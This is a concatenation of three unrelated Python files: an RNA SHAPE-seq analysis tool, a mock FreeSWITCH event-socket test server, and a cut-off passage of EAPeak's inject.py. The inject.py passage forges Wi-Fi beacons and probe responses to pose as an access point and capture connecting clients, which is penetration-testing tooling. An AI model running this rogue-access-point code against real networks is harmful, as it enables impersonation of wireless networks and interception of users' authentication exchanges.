data.append(datapt)
output_path = os.path.join(self.path, '{}{}.csv'.format(prefix, tgt.name))
self._write_csv(output_path, headers, data)
missing_targets = list(set([ s[0] for s in sites_missing_reads ]))
for tgt in missing_targets:
# only warn for sites "far from" the end (for now defined by 2 * minimum required match length)
min_len = spats.run.minimum_target_match_length
tgt_missing_sites = [ s for s in sites_missing_reads if s[0] == tgt and s[1] - s[2] > 2 * min_len ]
num_missing = len(tgt_missing_sites)
if 0 == num_missing:
# we might have pruned them due to length
continue
if self.cotrans:
tgt_missing_sites = [ "{}/{}".format(s[1], s[2]) for s in tgt_missing_sites ]
else:
tgt_missing_sites = [ str(s[2]) for s in tgt_missing_sites ]
if len(tgt_missing_sites) > 20:
tgt_missing_sites = tgt_missing_sites[:20]
tgt_missing_sites.append("...")
print(" ** Warning: target {} has 0 reads from both channels at {} sites: {} ".format(tgt.name, num_missing, ", ".join(tgt_missing_sites)))
def _write_csv(self, output_path, headers, data, delimiter=','):
with open(output_path, 'wt') as out_file:
writer = csv.writer(out_file, delimiter = delimiter)
if headers:
writer.writerow(headers)
for row in data:
writer.writerow(row)
self._add_note("Data dumped to {}".format(os.path.basename(output_path)))
def _dump_old_txt(self, spats, prefix = ""):
profiles = spats.compute_profiles()
mutations = spats.run.count_mutations
headers = [ "sequence", "rt_start", "five_prime_offset", "nucleotide", "treated_mods", "untreated_mods", "beta", "theta", "c" ]
if mutations:
headers[6] = "r"
if not spats.run.allow_negative_values:
headers[8] = "c_thresh"
data = []
if self.cotrans:
linker = spats.run.cotrans_linker[:-2]
tgt = spats.targets.targets[0]
tseq = tgt.seq
for key in profiles.cotrans_keys():
end = int(key.split('_')[-1])
rt_start = end + len(linker) + 1
prof = profiles.profilesForTargetAndEnd(tgt.name, end)
# xref https://trello.com/c/enfGViaw/398-cotrans-output-backwards-compatibility-for-other-lab-software
# always report `profiles.c_thresh` here, note that it's only different
# from `prof.c` when `not spats.run.allow_negative_values` -- in which
# case (see above) we update the column header name
cval = prof.c_thresh
seq = "{}_{}nt".format(tgt.name, end)
data = []
for i in range(end + 1):
datapt = [ seq, rt_start, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
if not i:
datapt += [ '-', '-', cval ]
elif mutations:
datapt += [ prof.r_mut[i], (prof.r_mut[i] / cval) if cval else prof.r_mut[i], cval ]
else:
datapt += [ prof.beta[i], prof.theta[i], cval ]
data.append(datapt)
for i in range(len(linker)):
data.append([ seq, rt_start, end + i + 1, linker[i], 0, 0, 0, 0, cval ])
output_path = os.path.join(self.path, '{}{}_{}_reactivities.txt'.format(prefix, seq, rt_start, tgt.name))
self._write_csv(output_path, headers, data, delimiter = '\t')
keys = [ 'treated', 'untreated' ]
if mutations:
keys += [ 'beta', 'mu', 'r' ]
else:
keys += [ 'beta', 'theta', 'rho' ]
cotrans_keys = profiles.cotrans_keys()
for key in keys:
ncols = 0
mat = []
for pkey in cotrans_keys:
end = int(pkey.split('_')[-1])
prof = profiles.profilesForTargetAndEnd(tgt.name, end)
vals = getattr(prof, key)
if not ncols:
ncols = len(cotrans_keys) + len(vals)
mat.append(vals)
name = { 'treated' : 'treated_mods_reads','untreated' : 'untreated_mods_reads' }.get(key, key)
self._write_csv('{}{}_table.txt'.format(prefix, name), None, mat, delimiter = '\t')
else:
for tgt in spats.targets.targets:
tseq = tgt.seq
end = len(tgt.seq)
prof = profiles.profilesForTarget(tgt)
data = []
rt_start = end - 1
for i in range(end):
datapt = [ tgt.name, rt_start, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
if not i:
datapt += [ '-', '-', prof.c ]
elif mutations:
datapt += [ prof.beta[i], prof.mu[i], prof.r_mut[i] ]
else:
datapt += [prof.beta[i], prof.theta[i], prof.c ]
data.append(datapt)
output_path = os.path.join(self.path, '{}{}.txt'.format(prefix, tgt.name))
self._write_csv(output_path, headers, data, delimiter = '\t')
def plot(self):
"""Plot data, provide an argument for the plot type. For
single-length, provide 'counts', 'rho', 'beta', 'theta',
'muts', or 'muts_reactivity'. For cotrans, provide 'counts',
'c', 'treated', 'untreated', 'treated_muts', 'untreated_muts',
'rho', 'beta', 'theta', 'r_mut', 'mu_mut', 'beta_mut',
'treated_mut', 'untreated_mut'.
"""
self._skip_log = True
if not self._command_args:
raise Exception("Plot requires a type.")
plot_type = self._command_args[0]
import plots
handler = getattr(plots, "plot_" + ("cotrans_" if self.cotrans else "sl_") + plot_type, None)
if not handler:
raise Exception("Invalid plot type: {}".format(plot_type))
plt = handler()
plt.show()
def handle_filter(self):
"""Generates an output of the demultiplexed positive and negative
fastq files for R1 and R2.
"""
self._skip_log = True
counters = Counters()
files = fastq_handle_filter(self.r1, self.r2, counters=counters)
self._add_note("{} pairs filtered to:\n {}".format(counters.RRRY + counters.YYYR, "\n ".join(files)))
self._add_note("{} RRRY pairs included.".format(counters.RRRY))
self._add_note("{} YYYR pairs included.".format(counters.YYYR))
self._add_note("{} pairs without matching handle were not included.".format(counters.no_mask))
def _pp_channel_files(self, channel_files):
treated = "RRRY"
untreated = "YYYR"
for cfp in channel_files:
cf = os.path.basename(cfp)
subprocess.check_call('gzip "{}"'.format(cfp), cwd = os.path.dirname(cfp), shell = True)
if cf.startswith('RRRY'):
treated = cf.split('_')[0]
elif cf.startswith('YYYR'):
untreated = cf.split('_')[0]
return treated, untreated
def to_shapeware(self):
"""Create a folder from a spats dataset suitable for running
with the SHAPEware tool produced by Arrakis.
"""
self._skip_log = True
if not self._command_args:
raise Exception("to_shapeware requires a path be specified for the ouptut folder.")
output_folder = self._command_args[0]
if os.path.exists(output_folder):
raise Exception("to_shapeware output folder already exists at {}".format(output_folder))
data_dir = os.path.join(output_folder, "raw_data")
os.makedirs(data_dir)
counters = Counters()
channel_files = fastq_handle_filter(self.r1, self.r2, strip_mask=True, outpath=data_dir, counters=counters)
treated, untreated = self._pp_channel_files(channel_files)
## Note: the denatured sample is used as a "baseline" in SHAPEware,
## for example: reactivity = (mutr_treated - mutr_untreated) / mutr_denatured
## Since we don't have denatured, we'll use the untreated sample as the baseline.
denatured = untreated
experiment_name = self.r1.split('_')[0]
target_file = self.config['target']
with open(target_file, 'r') as TF:
target_name = TF.readline().strip()
if target_name[0] == ">":
target_name = target_name[1:]
copyfile(target_file, os.path.join(output_folder, "ref_seqs.fa"))
copyfile(target_file, os.path.join(output_folder, "ref_masks.fa"))
input_sheet = os.path.join(output_folder, "input_sheet.csv")
with open(input_sheet, 'w') as IS:
IS.write("Experiment name,Replicate,Reference sequence,Ligand,Sample with SHAPE reagent,Sample without SHAPE reagent,Denatured sample\n")
IS.write("{},1,{},None,{},{},{}\n".format(experiment_name, target_name, treated, untreated, denatured))
self._add_note("Created SHAPEware folder at {}.".format(output_folder))
self._add_note(" {} treated pairs included.".format(counters.RRRY))
self._add_note(" {} untreated pairs included.".format(counters.YYYR))
self._add_note(" {} pairs without matching handle were not included.".format(counters.no_mask))
def compare(self):
from spats_shape_seq import Spats
from spats_shape_seq.pair import Pair
json_base = { 'target' : self.config['target'], 'config' : { 'algorithm' : 'find_partial', 'debug' : True }, 'expect' : {}}
spats_fp = Spats(cotrans = self.cotrans)
spats_lookup = Spats(cotrans = self.cotrans)
self._update_run_config(spats_fp.run)
self._update_run_config(spats_lookup.run, json_base['config'])
spats_fp.run.algorithm = 'find_partial'
spats_lookup.run.algorithm = 'lookup'
spats_fp.addTargets(self.config['target'])
spats_lookup.addTargets(self.config['target'])
count = 0
match = 0
with FastFastqParser(self.r1, self.r2) as parser:
total = parser.appx_number_of_pairs()
for batch in parser.iterator(5000):
for item in batch:
pair_fp = Pair()
pair_lookup = Pair()
if (not pair_fp.set_from_data(str(item[0]), item[1], item[2]) or
not pair_lookup.set_from_data(str(item[0]), item[1], item[2])):
print('\nskipping empty pair: {}'.format(str(item[0])))
continue
try:
spats_fp.process_pair(pair_fp)
spats_lookup.process_pair(pair_lookup)
except:
print('Error after {}/{}'.format(match, count))
raise
if (pair_fp.has_site == pair_lookup.has_site):
if not pair_fp.has_site:
count += 1
continue
elif (pair_fp.target.name == pair_lookup.target.name and
pair_fp.end == pair_lookup.end and
pair_fp.site == pair_lookup.site and
pair_fp.mutations == pair_lookup.mutations):
count += 1
match += 1
continue
json_base["id"] = str(item[0])
json_base["R1"] = str(item[1])
json_base["R2"] = str(item[2])
print('After {}/{} matches; mismatched pair: {} != {}\n{}'.format(match, count, pair_fp, pair_lookup,
json.dumps(json_base, sort_keys = True,indent = 4, separators = (',', ': '))))
return
print('{}/{}-{}...'.format(match, count, total))
spats_fp.counters.total_pairs = count
spats_lookup.counters.total_pairs = count
print('All match {}/{}.'.format(match, count))
print(spats_fp._report_counts())
print(spats_lookup._report_counts())
def _test_case_registry(self):
import spats_shape_seq.tests.test_harness
return spats_shape_seq.tests.test_harness.registry()
def extract_case(self):
"""Extracts a test case from the registry.
"""
self._skip_log = True
if not self._command_args or len(self._command_args) < 2:
raise Exception("extract requires a test case id and an output filename")
case_id = self._command_args[0]
test_case_file = self._command_args[1]
reg = self._test_case_registry()
case = reg.extract_case(case_id)
if not case:
raise Exception('Unknown case id: {}'.format(case_id))
open(test_case_file, 'w').write(json.dumps(case.jsonDict(), sort_keys = True, indent = 4, separators = (',', ': ')))
print("Extracted case '{}' to '{}'".format(case_id, test_case_file))
def add_case(self):
"""Adds a test case from the registry.
"""
self._skip_log = True
if not self._command_args:
raise Exception("add requires a test case file")
test_case_file = self._command_args[0]
test_case = json.loads(open(test_case_file, 'r').read())
reg = self._test_case_registry()
reg.add_case(test_case)
print("Added case '{}' to set '{}' in the test case registry.".format(test_case['id'], test_case['set_name']))
def show_test_case(self):
"""Shows the diagram and result for analysis of a unit test case.
"""
self._skip_log = True
if not self._command_args:
raise Exception("show_test_case requires a test id")
test_case_id = self._command_args[0]
print(test_case_id)
reg = self._test_case_registry()
test_case = reg.extract_case(test_case_id)
test_case.run_opts['debug'] = True
print(json.dumps(test_case.jsonDict(), sort_keys = True, indent = 4, separators = (',', ': ')))
self._show_case(test_case)
def show(self):
"""Shows the diagram and result for analysis of a test case pair.
"""
import spats_shape_seq.tests.test_harness
self._skip_log = True
if not self._command_args:
raise Exception("show requires the path to a test case")
test_case_file = self._command_args[0]
test_case_dict = json.loads(open(test_case_file, 'r').read())
test_case = spats_shape_seq.tests.test_harness.SpatsCase(test_case_dict)
self._show_case(test_case)
def _show_case(self, test_case):
from spats_shape_seq import Spats
from spats_shape_seq.diagram import diagram
alg = test_case.run_opts.get('algorithm')
algs = [ alg ] if alg else test_case.run_opts.get('algorithms', [ 'find_partial', 'lookup' ])
for algorithm in algs:
spats = Spats()
spats.run.algorithm = algorithm
for key, value in test_case.run_opts.items():
if str(key) == 'algorithms':
continue
if isinstance(value, unicode):
value = str(value)
if not hasattr(spats.run, key):
raise Exception('Invalid run_opt: {}'.format(key))
setattr(spats.run, key, value)
for name, seq in iter(test_case.targets.items()):
spats.addTarget(name, seq)
pair = test_case.pair()
if len(algs) > 1:
print('\n[[ ALGORITHM: {} ]]'.format(algorithm))
spats.process_pair(pair)
if test_case.comment:
print('Comment: {}'.format(test_case.comment))
print(diagram(pair, spats.run))
if test_case.expect:
# should mirror `_check_expect` in test_harness.py...
expects = test_case.expect
fail = False
try:
if expects['site'] is None:
if pair.site is not None:
raise Exception("pair.site={} when expecting none.".format(pair.site))
else:
if pair.site is None:
raise Exception("pair.site is none when expecting {}.".format(expects['site']))
if pair.site != expects['site']:
raise Exception("pair.site={} != expect.site={}".format(pair.site, expects['site']))
if 'end' in expects and pair.end != expects['end']:
raise Exception("pair.end={} != expect.end={}".format(pair.end, expects['end']))
if 'muts' in expects:
if expects['muts'] is not None and len(expects['muts']) > 0:
if not sorted(expects['muts']) == (sorted(pair.mutations) if pair.mutations else pair.mutations):
raise Exception("mismatching mutations: expected={}, pair.mutations={}".format(expects['muts'], pair.mutations))
else:
if not (pair.mutations is None or len(pair.mutations) == 0):
raise Exception("unexpected mutations: {}".format(pair.mutations))
if 'r1_indels' in expects:
r1inds = objdict_to_dict(pair.r1.indels)
if expects['r1_indels']:
if expects['r1_indels'] != r1inds:
raise Exception("mismatching R1 indels: expected={}, pair.r1.indels={}".format(expects['r1_indels'], r1inds))
elif pair.r1.indels:
raise Exception("unexpected R1 indels: pair.r1.indels={}".format(pair.r1.indels))
if 'r2_indels' in expects:
r2inds = objdict_to_dict(pair.r2.indels)
if expects['r2_indels']:
if expects['r2_indels'] != r2inds:
raise Exception("mismatching R2 indels: expected={}, pair.r2.indels={}".format(expects['r2_indels'], r2inds))
elif pair.r2.indels:
raise Exception("unexpected R2 indels: pair.r2.indels={}".format(r2inds))
if 'counters' in expects:
for counter, value in iter(expects['counters'].items()):
if getattr(spats.counters, str(counter)) != value:
raise Exception("counter '{}' value off: expected={} != got={}".format(counter, value, getattr(spats.counters, counter)))
if 'pair.target' in expects:
tname = pair.target.name if pair.target else None
if tname != expects['pair.target']:
raise Exception("pair.target={} != expect.pair.target={}".format(tname, expects['pair.target']))
except Exception as e:
print('FAIL: {}'.format(e))
sys.exit(1)
print('PASS')
def doc(self):
"""Show the spats documentation.
"""
self._skip_log = True
if spats_shape_seq._PUBLIC_RELEASE:
import webbrowser
webbrowser.open('http://spats.readthedocs.io/')
else:
subprocess.check_call(["make", "showdocs"], cwd = self._spats_path())
def help(self):
"""Display available commands.
"""
self._skip_log = True
print("\nspats_tool v{}\nCommands:\n".format(spats_shape_seq._VERSION))
for key in sorted(SpatsTool.__dict__.keys()):
if key.startswith('_'):
continue
if key in self._private_commands and spats_shape_seq._PUBLIC_RELEASE:
continue
value = getattr(SpatsTool, key)
if value.__doc__:
print(" {}: {}".format(key, value.__doc__.rstrip()))
print("\nData commands require 'spats.config' to be present in the current working directory,")
print("which requires a [spats] section header and should at least specify the 'target', 'r1',")
print("and 'r2' configuration keys.\n")
_spats_config_template = """
[spats]
# set to True/False depending on whether this is a cotrans experiment
cotrans = True
# Required for pre-sequencing tool: the path to the ABIF (.fsa) file. Can also be a comma-separated list for multiple files.
#preseq =
# Required for SPATS runs and reads analysis: the path to the targets FASTA file.
#target =
# Required for SPATS runs and reads analysis: the paths to the R1/R2 data files.
#r1 =
#r2 =
# Known metadata. Recommended to provide all applicable fields.
[metadata]
# Experiment name
#name =
# Author / Experimenter (initials)
#author =
# Date: this will be filled in automatically (today's date/time) unless explicitly provided.
#date =
# Folding conditions:
#buffer =
#temperature =
#salt =
#probe =
# Lot numbers:
#adapter =
#enzyme =
#reagent =
"""
def run(args, path = None):
SpatsTool(path)._run(args)
if __name__ == '__main__':
run(sys.argv[1:])
|
fakeeslserver.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import threading
import time
class FakeESLServer(object):
def __init__(self, address, port, password):
self._address = address
self._port = port
self._password = password
self._client_socket = None
self._running = False
self.commands = {}
self.setup_commands()
def setup_commands(self):
self.commands['api khomp show links concise'] = ('B00L00:kes{SignalLost},sync\n' +
'B01L00:kesOk,sync\n' +
'B01L01:[ksigInactive]\n')
def start_server(self):
self.server = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((self._address, self._port))
self.server.listen(10)
self._running = True
self._read_thread = threading.Thread(target=self.protocol_read)
self._read_thread.setDaemon(True)
self._read_thread.start()
def command_reply(self, data):
self._client_socket.send('Content-Type: command/reply\n')
self._client_socket.send('Reply-Text: %s\n\n' % data)
def protocol_send(self, lines):
for line in lines:
self._client_socket.send(line + '\n')
self._client_socket.send('\n')
def api_response(self, data):
data_length = len(data)
self._client_socket.send('Content-Type: api/response\n')
self._client_socket.send('Content-Length: %d\n\n' % data_length)
self._client_socket.send(data)
def handle_request(self, request):
if request.startswith('auth'):
received_password = request.split()[-1].strip()
if received_password == self._password:
self.command_reply('+OK accepted')
else:
self.command_reply('-ERR invalid')
self.disconnect()
elif request == 'exit':
self.command_reply('+OK bye')
self.disconnect()
self.stop()
elif request in self.commands:
data = self.commands.get(request)
if request.startswith('api'):
self.api_response(data)
else:
self.command_reply(data)
else:
if request.startswith('api'):
self.api_response('-ERR %s Command not found\n' % request.replace('api', '').split()[0])
else:
self.command_reply('-ERR command not found')
def protocol_read(self):
self._client_socket, address = self.server.accept()
self.protocol_send(['Content-Type: auth/request'])
while self._running:
buf = ''
while self._running:
try:
read = self._client_socket.recv(1)
except Exception:
self._running = False
self.server.close()
break
buf += read
if buf[-2:] == '\n\n' or buf[-4:] == '\r\n\r\n':
request = buf
break
request = buf.strip()
if not request and not self._running:
break
self.handle_request(request)
def fake_event_plain(self, data):
self.protocol_send(['Content-Type: text/event-plain',
'Content-Length: %s' % len(data)])
self._client_socket.send(data)
def disconnect(self):
self.protocol_send(['Content-Type: text/disconnect-notice',
'Content-Length: 67'])
self._client_socket.send('Disconnected, goodbye.\n')
self._client_socket.send('See you at ClueCon! http://www.cluecon.com/\n')
self._running = False
self._client_socket.close()
def stop(self):
self._client_socket.close()
self.server.close()
if self._running:
self._running = False
self._read_thread.join(5)
def main():
server = FakeESLServer('0.0.0.0', 8021, 'ClueCon')
server.start_server()
while server._running:
time.sleep(1)
server.stop()
if __name__ == '__main__':
main()
|
inject.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lib/eapeak/inject.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import Queue
from random import randint
from struct import pack, unpack
import threading
import time
# external imports
from scapy.layers.dot11 import RadioTap, Dot11, Dot11Beacon, Dot11Elt, Dot11Auth, Dot11AssoReq, Dot11AssoResp, Dot11ProbeReq, Dot11Disas, Dot11QoS, Dot11ProbeResp
from scapy.layers.l2 import LLC, SNAP, EAPOL
from scapy.sendrecv import sniff, sendp
# project imports
from eapeak.common import get_bssid, get_source, get_destination, __version__
from eapeak.parse import parse_rsn_data, build_rsn_data
from eapeak.scapylayers.l2 import LEAP, PEAP, EAP # pylint: disable=unused-import
from ipfunc import getHwAddr
RESPONSE_TIMEOUT = 1.5 # Time to wait for a response
PRIVACY_NONE = 0
PRIVACY_WEP = 1
PRIVACY_WPA = 2
EAP_MAX_TRIES = 3
GOOD = '\033[1;32m[+]\033[1;m '
STATUS = '\033[1;34m[*]\033[1;m '
ERROR = '\033[1;31m[-]\033[1;m '
class SSIDBroadcaster(threading.Thread):
"""
This object is a thread-friendly SSID broadcaster
It's meant to be controlled by the Wireless State Machine
"""
def __init__(self, interface, essid, bssid=None):
threading.Thread.__init__(self)
self.interface = interface
self.essid = essid
if not bssid:
bssid = getHwAddr(interface)
self.bssid = bssid.lower()
self.broadcast_interval = 0.15
self.channel = "\x06"
self.set_privacy(PRIVACY_NONE)
self.sequence = randint(1200, 2000)
self.__shutdown__ = False
def __fixSC__(self, fragment=0):
"""
This is a reserved method to return the sequence number in a way
that is not skewed by a bug in how the SC field is packed in
Scapy.
"""
if self.sequence >= 0xFFF:
self.sequence = 1
else:
self.sequence += 1
SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4)
return unpack('<H', pack('>H', SC))[0]
def run(self):
"""
This is the thread routine that broadcasts the SSID.
"""
while not self.__shutdown__:
self.beacon.getlayer(Dot11).SC = self.__fixSC__()
sendp(self.beacon, iface=self.interface, verbose=False)
time.sleep(self.broadcast_interval)
def set_privacy(self, value):
"""
Configure the privacy settings for None, WEP, and WPA
"""
if value == PRIVACY_NONE:
self.beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
Dot11Beacon(cap='ESS+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=self.essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=self.channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif value == PRIVACY_WEP:
self.beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=self.essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=self.channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif value == PRIVACY_WPA:
self.beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=self.essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=self.channel)/
Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
Dot11Elt(ID=42, info="\x00")/
Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
)
def send_beacon(self):
"""
Convenience function for sending beacons without starting a thread
"""
self.beacon.getlayer(Dot11).SC = self.__fixSC__()
sendp(self.beacon, iface=self.interface, verbose=False)
@staticmethod
def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6):
"""
Convenience function for sending beacons without a thread or creating an instance
"""
if not bssid:
bssid = getHwAddr(interface)
channel = chr(channel)
sequence = randint(1200, 2000)
if privacy in [PRIVACY_NONE, 'none', 'NONE']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
Dot11Elt(ID=42, info="\x00")/
Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
)
else:
raise Exception('Invalid privacy setting')
sendp(beacon, iface=interface, verbose=False)
class ClientListener(threading.Thread):
"""
This object is a thread-friendly listener for Client connection
attempts.
The backlog corresponds to the size of the queue, if the queu is
full because the items are not being handled fast enough then new
association requests will be dropped and lost.
"""
def __init__(self, interface, backlog, essid=None, bssid=None):
threading.Thread.__init__(self)
self.interface = interface
self.backlog = backlog
self.essid = essid
if not bssid:
bssid = getHwAddr(interface)
self.bssid = bssid.lower()
self.lastpacket = None
self.client_queue = Queue.Queue(self.backlog)
self.channel = "\x06"
self.sequence = randint(1200, 2000)
self.__shutdown__ = False
def __fixSC__(self, fragment=0):
"""
This is a reserved method to return the sequence number in a way
that is not skewed by a bug in how the SC field is packed in
Scapy.
"""
if self.sequence >= 0xFFF:
self.sequence = 1
else:
self.sequence += 1
SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) # bit shifts FTW!
return unpack('<H', pack('>H', SC))[0]
def __stopfilter__(self, packet):
"""
This is the stop filter for Scapy to be used to check if the
packet was sent to EAPeak.
"""
if packet.haslayer(Dot11Auth) or packet.haslayer(Dot11AssoReq):
if get_bssid(packet) == self.bssid and get_source(packet) != self.bssid:
self.lastpacket = packet
return True
return False
elif packet.haslayer(Dot11ProbeReq):
self.lastpacket = packet
return True
return False
def set_privacy(self, value):
"""
Configure the privacy settings for None, WEP, and WPA
"""
if value == PRIVACY_NONE:
self.probe_response_template = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info='')/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=self.channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif value == PRIVACY_WEP:
self.probe_response_template = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
Dot11ProbeResp(cap='ESS+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info='')/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=self.channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif value == PRIVACY_WPA:
self.probe_response_template = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info='')/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=self.channel)/
Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
Dot11Elt(ID=42, info="\x00")/
Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
)
def run(self):
"""
This is the thread routine that handles probe requests and sends
probe responses when appropriate.
"""
while not self.__shutdown__:
sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__)
if self.lastpacket:
if self.lastpacket.haslayer(Dot11ProbeReq):
ssid = None
tmp = self.lastpacket.getlayer(Dot11ProbeReq)
while tmp:
tmp = tmp.payload
if tmp.fields['ID'] == 0:
ssid = tmp.info
break
if ssid is None:
continue
elif ssid == '' and self.essid:
ssid = self.essid
if self.essid is None or self.essid == ssid:
self.probe_response_template.getlayer(Dot11).addr1 = get_source(self.lastpacket)
self.probe_response_template.getlayer(Dot11Elt).info = ssid
sendp(self.probe_response_template, iface=self.interface, verbose=False)
self.lastpacket = None
continue
clientMAC = get_source(self.lastpacket)
if not self.client_queue.full():
self.client_queue.put(clientMAC, False)
self.lastpacket = None
continue
class WirelessStateMachine:
"""
This provides a psuedo-socket like object that provides a stack for
